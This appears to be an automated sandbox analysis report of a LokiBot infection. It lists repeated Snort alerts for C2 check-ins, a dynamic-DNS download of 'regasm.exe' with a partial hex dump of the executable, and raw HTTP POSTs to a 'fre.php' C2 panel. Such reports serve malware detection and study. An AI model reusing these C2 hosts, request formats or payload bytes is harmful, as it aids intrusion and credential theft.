Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49203 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49203 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49203 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49204 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49204 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49204 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49204 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49205 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49205 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49205 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49205 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49206 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49206 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49206 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49206 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49207 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49207 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49207 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49207 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49208 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49208 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49208 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49208 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49209 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49209 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49209 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49209 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49210 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49210 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49210 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49210 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49211 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49211 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49211 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49211 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49212 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49212 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49212 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49212 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49213 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49213 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49213 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49213 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49214 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49214 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49214 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49214 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49215 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49215 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49215 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49215 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49216 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49216 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49216 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49216 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49217 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49217 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49217 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49217 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49218 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49218 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49218 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49218 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49219 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49219 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49219 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49219 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49220 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49220 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49220 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49220 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49221 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49221 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49221 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49221 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49222 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49222 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49222 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49222 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49223 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49223 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49223 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49223 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49224 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49224 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49224 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49224 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49225 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49225 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49225 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49225 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49226 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49226 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49226 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49226 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49227 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49227 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49227 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49227 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49228 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49228 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49228 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49228 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49229 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49229 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49229 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49229 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49230 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49230 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49230 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49230 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49231 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49231 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49231 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49231 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49232 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49232 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49232 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49232 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49233 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49233 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49233 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49233 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49234 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49234 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49234 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49234 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49235 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49235 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49235 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49235 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49236 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49236 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49236 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49236 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49237 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49237 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49237 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49237 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49238 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49238 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49238 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49238 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49239 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49239 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49239 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49239 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49240 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49240 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49240 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49240 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49241 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49241 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49241 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49241 -> 89.208.229.230:80
Uses dynamic DNS servicesShow sources
Source: unknownDNS query: name: russchine2wsdyspecial6plumbingjkmaterial.duckdns.org
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 16 Apr 2020 08:43:02 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 15 Apr 2020 21:57:30 GMTETag: "130600-5a35b671d1753"Accept-Ranges: bytesContent-Length: 1246720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3b 2c 75 de 7f 4d 1b 8d 7f 4d 1b 8d 7f 4d 1b 8d e1 ed dc 8d 78 4d 1b 8d 8e 8b d6 8d 58 4d 1b 8d 8e 8b d5 8d 91 4d 1b 8d 8e 8b d4 8d 2c 4d 1b 8d 19 a3 c9 8d 64 4d 1b 8d 76 35 98 8d 22 4d 1b 8d 83 3a a7 8d 7d 4d 1b 8d 7f 4d 1a 8d b0 4c 1b 8d 83 3a a2 8d 56 4d 1b 8d 19 a3 d4 8d 7c 4d 1b 8d 19 a3 d2 8d 7e 4d 1b 8d 7f 4d 8c 8d 7e 4d 1b 8d 19 a3 d7 8d 7e 4d 1b 8d 52 69 63 68 7f 4d 1b 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 25 67 97 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 80 0b 00 00 82 07 00 00 00 00 00 5f c4 09 00 00 10 00 00 00 90 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 13 00 00 04 00 00 be 77 13 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 5e 0d 00 a4 01 00 00 00 00 0e 00 bc 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 12 00 a4 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 18 0d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 0b 00 4c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 86 7f 0b 00 00 10 00 00 00 80 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 f4 01 00 00 90 0b 00 00 f6 01 00 00 84 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 65 00 00 00 90 0d 00 00 34 00 00 00 7a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 bc 28 04 00 00 00 0e 00 00 2a 04 00 00 ae 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 2a 2d 01 00 00 30 12 00 00 2e 01 00 00 d8 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /russdoc/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: russchine2wsdyspecial6plumbingjkmaterial.duckdns.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 174Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 174Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
